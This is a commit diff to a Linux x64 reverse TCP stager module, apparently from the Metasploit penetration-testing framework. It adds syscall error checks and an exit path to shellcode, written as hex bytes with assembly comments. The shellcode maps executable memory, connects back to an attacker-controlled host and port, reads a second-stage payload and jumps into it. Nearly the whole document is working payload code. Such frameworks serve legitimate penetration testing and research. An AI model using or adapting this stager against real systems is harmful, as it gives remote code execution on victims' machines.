add error handling to x64 reverse tcp stager

2017-06-25 06:19:29 +09:00 · 2017-06-25 06:19:29 +09:00 · 799fcbd9e7
parent 04f0a55ed4
commit 799fcbd9e7
1 changed files with 19 additions and 4 deletions
--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@ -17,7 +17,7 @@ module MetasploitModule
    super(merge_info(info,
      'Name'          => 'Reverse TCP Stager',
      'Description'   => 'Connect back to the attacker',
-      'Author'        => 'ricky',
+      'Author'        => ['ricky', 'tkmru'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X64,
@ -26,8 +26,8 @@ module MetasploitModule
        {
          'Offsets' =>
            {
-              'LHOST' => [ 45, 'ADDR' ],
-              'LPORT' => [ 43, 'n'    ],
+              'LHOST' => [ 55, 'ADDR' ],
+              'LPORT' => [ 53, 'n'    ],
            },
          'Payload' =>
            "\x48\x31\xff"                 + # xor    %rdi,%rdi
@ -42,6 +42,8 @@ module MetasploitModule
            "\xb2\x07"                     + # mov    $0x7,%dl
            "\x0f\x05"                     + # syscall
            # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x3c"                     + # js     40012c <failed>
            "\x56"                         + # push   %rsi
            "\x50"                         + # push   %rax
            "\x6a\x29"                     + # pushq  $0x29
@ -53,6 +55,8 @@ module MetasploitModule
            "\x5e"                         + # pop    %rsi
            "\x0f\x05"                     + # syscall
            # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x29"                     + # js     40012c <failed>
            "\x48\x97"                     + # xchg   %rax,%rdi
            "\x48\xb9\x02\x00"             + # movabs $0x100007fb3150002,%rcx
            "\x15\xb3"                     + # LPORT
@ -65,12 +69,23 @@ module MetasploitModule
            "\x58"                         + # pop    %rax
            "\x0f\x05"                     + # syscall
            # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x0c"                     + # js     40012c <failed>
            "\x59"                         + # pop    %rcx
            "\x5e"                         + # pop    %rsi
            "\x5a"                         + # pop    %rdx
            "\x0f\x05"                     + # syscall
            # read(3, "", 4096)
-            "\xff\xe6"                       # jmpq   *%rsi
+            "\x48\x85\xc0"                 + # test   %rax,%rax
+            "\x78\x02"                     + # js     40012c <failed>
+            "\xff\xe6"                     + # jmpq   *%rsi
+            # 40012c <failed>:
+            "\x6a\x3c"                     + # pushq  $0x3c
+            "\x58"                         + # pop    %rax
+            "\x6a\x01"                     + # pushq  $0x1
+            "\x5f"                         + # pop    %rdi
+            "\x0f\x05"                       #syscall
+            # exit(1)
        }
      ))
  end